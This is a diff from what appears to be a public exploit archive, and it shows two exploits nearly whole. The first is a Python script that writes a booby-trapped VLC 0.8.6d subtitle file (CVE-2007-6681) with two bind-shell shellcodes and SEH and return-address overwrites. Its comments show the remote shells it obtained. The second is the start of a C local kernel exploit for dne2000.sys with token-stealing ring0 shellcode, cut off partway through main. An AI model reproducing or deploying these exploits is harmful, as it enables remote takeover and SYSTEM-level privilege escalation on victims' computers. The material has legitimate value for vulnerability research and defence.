-# SECOND SHELL -> SEH OVERFLOW
-#
-# Connection closed by foreign host.
-# matte@badrobot:~$ telnet 192.168.1.245 4444
-# Trying 192.168.1.245...
-# Connected to 192.168.1.245.
-# Escape character is '^]'.
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Program Files\VideoLAN\VLC>
-#-----------------------------------------------------------------------------
-
-# win32_bind -  EXITFUNC=seh LPORT=4444
-# Size=709 Encoder=PexAlphaNum http://metasploit.com
-SHELLCODE1 = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
-"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
-"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
-"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
-"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
-"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
-"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
-"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
-"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
-"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
-"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
-"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
-"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
-"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
-"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
-"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
-"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
-"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
-"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
-"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
-"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
-"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
-"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
-"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
-"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
-"\x4f\x4f\x42\x4d\x5a"
-)
-
-# win32_bind -  EXITFUNC=thread LPORT=4444
-# [*] x86/alpha_mixed succeeded, final size 698
-SHELLCODE2 = (
-"\x89\xe7\xd9\xcb\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
-"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
-"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
-"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
-"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4a\x59\x4b\x4f\x4b"
-"\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x51\x34\x4c\x4b"
-"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x43\x31\x4a"
-"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31"
-"\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50"
-"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
-"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47"
-"\x4b\x51\x44\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
-"\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
-"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
-"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x50\x31\x49"
-"\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
-"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
-"\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
-"\x4e\x36\x45\x36\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x42"
-"\x48\x42\x57\x42\x53\x46\x52\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
-"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
-"\x36\x51\x4f\x4b\x39\x4b\x55\x42\x46\x4b\x31\x4a\x4d\x43\x38"
-"\x45\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38\x4e"
-"\x39\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x50\x53"
-"\x51\x43\x46\x33\x46\x33\x51\x43\x47\x33\x51\x43\x47\x33\x51"
-"\x43\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x45\x36"
-"\x46\x33\x4d\x59\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x42"
-"\x50\x49\x57\x46\x37\x4b\x4f\x4e\x36\x43\x5a\x44\x50\x50\x51"
-"\x50\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4b"
-"\x59\x46\x37\x4b\x4f\x48\x56\x51\x43\x46\x35\x4b\x4f\x48\x50"
-"\x45\x38\x4b\x55\x51\x59\x4d\x56\x47\x39\x51\x47\x4b\x4f\x48"
-"\x56\x46\x30\x46\x34\x46\x34\x51\x45\x4b\x4f\x4e\x30\x4a\x33"
-"\x45\x38\x4d\x37\x43\x49\x48\x46\x43\x49\x51\x47\x4b\x4f\x4e"
-"\x36\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x43\x54\x43\x56"
-"\x43\x58\x42\x43\x42\x4d\x4b\x39\x4b\x55\x42\x4a\x50\x50\x46"
-"\x39\x46\x49\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4d\x59"
-"\x4b\x52\x50\x31\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
-"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
-"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x43\x42\x4b\x4e\x4e\x53\x44"
-"\x56\x4b\x4f\x44\x35\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
-"\x46\x32\x50\x51\x46\x31\x50\x51\x43\x5a\x45\x51\x46\x31\x46"
-"\x31\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59"
-"\x44\x45\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
-"\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
-"\x48\x44\x42\x44\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x42"
-"\x48\x4a\x4f\x48\x4e\x4d\x30\x45\x30\x46\x33\x4b\x4f\x49\x46"
-"\x4b\x4f\x4e\x30\x44\x4a\x41\x41" )
-
-OFFSET1 = 'A'*152242
-NOP1    = '\x90'*16
-OFFSET2 = 'B'*10901
-JMPESP  = '\x59\x65\xFE\x62'     # 0x62FE6559     jmp ESP libvlc.dll
-OFFSET3 = 'C'*674
-SEH     = '\x66\x14\x40'         # POP POP RET   in vlc.exe
-JMPBACK = '\xE9\x2E\xCD\xFF\xFF' # ^E9 2ECDFFFF  JMP 0250CCD2
-JMPS    = '\xEB\xF9\x90\x90'
-EVIL    = OFFSET1 + NOP1 + SHELLCODE1 + OFFSET2 + JMPESP + SHELLCODE1 + OFFSET3 + JMPBACK + JMPS + SEH
-
-fileHandle = open('film1.ssa', 'w' )
-fileHandle.write('[Script Info]\n')
-fileHandle.write('ScriptType: v4.00\n')
-fileHandle.write('Title: VLC 0.8.6d buffer-overflow\n')
-fileHandle.write('Collisions: Normal\n\n')
-fileHandle.write('[V4 Styles]\n\n')
-fileHandle.write('[Events]\n')
-fileHandle.write('Dialogue: '+ EVIL)
-fileHandle.close()
-
-# milw0rm.com [2008-05-23]
+#!/usr/bin/python
+#
+# VLC 0.8.6d Double Sh311 Universal Exploit
+# CVE-2007-6681
+# Vulnerability Discovered by Michal Luczaj
+#
+# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
+# and
+# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
+# WE CODED IT JUST FOR FUN ;)
+# Cheers to #offsec and all our firends :) and prelate_ hehe
+#-----------------------------------------------------------------------------
+#
+# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
+#
+# matte@badrobot:~$ telnet 192.168.1.245 4444
+# Trying 192.168.1.245...
+# Connected to 192.168.1.245.
+# Escape character is '^]'.
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files\VideoLAN\VLC>exit
+# exit
+#
+# AT "EXIT" SEH is CALLED and WE OWN EIP AGAIN :P
+# SECOND SHELL -> SEH OVERFLOW
+#
+# Connection closed by foreign host.
+# matte@badrobot:~$ telnet 192.168.1.245 4444
+# Trying 192.168.1.245...
+# Connected to 192.168.1.245.
+# Escape character is '^]'.
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# C:\Program Files\VideoLAN\VLC>
+#-----------------------------------------------------------------------------
+
+# win32_bind -  EXITFUNC=seh LPORT=4444
+# Size=709 Encoder=PexAlphaNum http://metasploit.com
+SHELLCODE1 = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
+"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
+"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
+"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
+"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
+"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
+"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
+"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
+"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
+"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
+"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
+"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
+"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
+"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
+"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
+"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
+"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
+"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
+"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
+"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
+"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
+"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
+"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
+"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
+"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
+"\x4f\x4f\x42\x4d\x5a"
+)
+
+# win32_bind -  EXITFUNC=thread LPORT=4444
+# [*] x86/alpha_mixed succeeded, final size 698
+SHELLCODE2 = (
+"\x89\xe7\xd9\xcb\xd9\x77\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4a\x59\x4b\x4f\x4b"
+"\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x51\x34\x4c\x4b"
+"\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x43\x31\x4a"
+"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31"
+"\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50"
+"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
+"\x49\x51\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47"
+"\x4b\x51\x44\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
+"\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
+"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
+"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x50\x31\x49"
+"\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
+"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
+"\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
+"\x4e\x36\x45\x36\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x42"
+"\x48\x42\x57\x42\x53\x46\x52\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
+"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
+"\x36\x51\x4f\x4b\x39\x4b\x55\x42\x46\x4b\x31\x4a\x4d\x43\x38"
+"\x45\x52\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38\x4e"
+"\x39\x44\x49\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x50\x53"
+"\x51\x43\x46\x33\x46\x33\x51\x43\x47\x33\x51\x43\x47\x33\x51"
+"\x43\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x45\x36"
+"\x46\x33\x4d\x59\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x42"
+"\x50\x49\x57\x46\x37\x4b\x4f\x4e\x36\x43\x5a\x44\x50\x50\x51"
+"\x50\x55\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e\x4b"
+"\x59\x46\x37\x4b\x4f\x48\x56\x51\x43\x46\x35\x4b\x4f\x48\x50"
+"\x45\x38\x4b\x55\x51\x59\x4d\x56\x47\x39\x51\x47\x4b\x4f\x48"
+"\x56\x46\x30\x46\x34\x46\x34\x51\x45\x4b\x4f\x4e\x30\x4a\x33"
+"\x45\x38\x4d\x37\x43\x49\x48\x46\x43\x49\x51\x47\x4b\x4f\x4e"
+"\x36\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x43\x54\x43\x56"
+"\x43\x58\x42\x43\x42\x4d\x4b\x39\x4b\x55\x42\x4a\x50\x50\x46"
+"\x39\x46\x49\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4d\x59"
+"\x4b\x52\x50\x31\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
+"\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
+"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x43\x42\x4b\x4e\x4e\x53\x44"
+"\x56\x4b\x4f\x44\x35\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
+"\x46\x32\x50\x51\x46\x31\x50\x51\x43\x5a\x45\x51\x46\x31\x46"
+"\x31\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59"
+"\x44\x45\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
+"\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
+"\x48\x44\x42\x44\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x42"
+"\x48\x4a\x4f\x48\x4e\x4d\x30\x45\x30\x46\x33\x4b\x4f\x49\x46"
+"\x4b\x4f\x4e\x30\x44\x4a\x41\x41" )
+
+OFFSET1 = 'A'*152242
+NOP1    = '\x90'*16
+OFFSET2 = 'B'*10901
+JMPESP  = '\x59\x65\xFE\x62'     # 0x62FE6559     jmp ESP libvlc.dll
+OFFSET3 = 'C'*674
+SEH     = '\x66\x14\x40'         # POP POP RET   in vlc.exe
+JMPBACK = '\xE9\x2E\xCD\xFF\xFF' # ^E9 2ECDFFFF  JMP 0250CCD2
+JMPS    = '\xEB\xF9\x90\x90'
+EVIL    = OFFSET1 + NOP1 + SHELLCODE1 + OFFSET2 + JMPESP + SHELLCODE1 + OFFSET3 + JMPBACK + JMPS + SEH
+
+fileHandle = open('film1.ssa', 'w' )
+fileHandle.write('[Script Info]\n')
+fileHandle.write('ScriptType: v4.00\n')
+fileHandle.write('Title: VLC 0.8.6d buffer-overflow\n')
+fileHandle.write('Collisions: Normal\n\n')
+fileHandle.write('[V4 Styles]\n\n')
+fileHandle.write('[Events]\n')
+fileHandle.write('Dialogue: '+ EVIL)
+fileHandle.close()
+
+# milw0rm.com [2008-05-23]
diff --git a/platforms/windows/local/5837.c b/platforms/windows/local/5837.c
index d3d882a7a..742b527ec 100755
--- a/platforms/windows/local/5837.c
+++ b/platforms/windows/local/5837.c
@@ -1,256 +1,256 @@
-/* dne2000-call.c
- *
- * Copyright (c) 2008 by 
- *
- * Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit
- * by mu-b - Sun 06 Jan 2008
- *
- * - Tested on: dne2000.sys 2.21.7.233 <-> 3.21.7.17464
- *     bundled with: SafeNET HighAssurance Remote, SoftRemote
- *                   Cisco VPN Client
- *                   Winproxy
- *
- * Compile: MinGW + -lntdll
- *
- *    - Private Source Code -DO NOT DISTRIBUTE -
- * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
- */
-
-#include 
-#include 
-
-#include 
-#include 
-
-#define DNE_IOCTL     0x00222008
-#define DNE_FLAG      0x00001005
-
-#define ITEM_FLAG_1   0x4A424F4E
-#define ITEM_FLAG_2   0x47554C50
-#define FUNC_FLAG     0x00010003
-
-static unsigned char win32_fixup[] =
-  "\x56";
-
-static unsigned char win2k3_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\xb0\x18\x02\x00\x00"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x94\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x9c\x00\x00\x00"
-  "\x2d\x98\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xd8\x00\x00\x00"
-  "\x89\x88\xd8\x00\x00\x00"
-  "\x90";
-
-static unsigned char winxp_ring0_shell[] =
-  /* _ring0 */
-  "\xb8\x24\xf1\xdf\xff"
-  "\x8b\x00"
-  "\x8b\x70\x44"
-  "\x89\xf0"
-  /* _sys_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x04\x00\x00\x00"
-  "\x74\x11"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  "\xeb\x21"
-  /* _sys_eprocess_found  */
-  "\x89\xc1"
-  "\x89\xf0"
-
-  /* _cmd_eprocess_loop   */
-  "\x8b\x98\x84\x00\x00\x00"
-  "\x81\xfb\x00\x00\x00\x00"
-  "\x74\x10"
-  "\x8b\x80\x8c\x00\x00\x00"
-  "\x2d\x88\x00\x00\x00"
-  "\x39\xf0"
-  "\x75\xe3"
-  /* _not_found           */
-  "\xcc"
-  /* _cmd_eprocess_found
-   * _ring0_end           */
-
-  /* copy tokens!$%!      */
-  "\x8b\x89\xc8\x00\x00\x00"
-  "\x89\x88\xc8\x00\x00\x00"
-  "\x90";
-
-static unsigned char win32_ret[] =
-  "\x5e"
-  "\xc2\x10\x00";
-
-struct ioctl_func {
-  char  _pad[0x04];
-  int flag;
-  char __pad[0x2C];
-  void *func_ptr;
-};
-
-struct ioctl_item {
-  int flag;
-  char _pad[0x24];
-  struct ioctl_func *item_func;
-  struct ioctl_item *item_ptr;
-};
-
-struct ioctl_req {
-  int req_num;
-  struct ioctl_item *ptr[2];
-};
-
-static PCHAR
-fixup_ring0_shell (DWORD ppid, DWORD *zlen)
-{
-  DWORD dwVersion, dwMajorVersion, dwMinorVersion;
-
-  dwVersion = GetVersion ();
-  dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
-  dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
-
-  if (dwMajorVersion != 5)
-    {
-      fprintf (stderr, "* GetVersion, unsupported version\n");
-      exit (EXIT_FAILURE);
-    }
-
-  switch (dwMinorVersion)
-    {
-      case 1:
-        *zlen = sizeof winxp_ring0_shell - 1;
-        *(PDWORD) &winxp_ring0_shell[55] = ppid;
-        return (winxp_ring0_shell);
-
-      case 2:
-        *zlen = sizeof win2k3_ring0_shell - 1;
-        *(PDWORD) &win2k3_ring0_shell[58] = ppid;
-        return (win2k3_ring0_shell);
-
-      default:
-        fprintf (stderr, "* GetVersion, unsupported version\n");
-        exit (EXIT_FAILURE);
-    }
-
-  return (NULL);
-}
-
-int
-main (int argc, char **argv)
-{
-  struct ioctl_req req;
-  struct ioctl_item items[2];
-  struct ioctl_func funcs;
-  LPVOID zpage, zbuf;
-  DWORD rlen, zlen, ppid;
-  HANDLE hFile;
-  BOOL result;
-
-  printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
-          "by: \n"
-          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
-
-  if (argc <= 1)
-    {
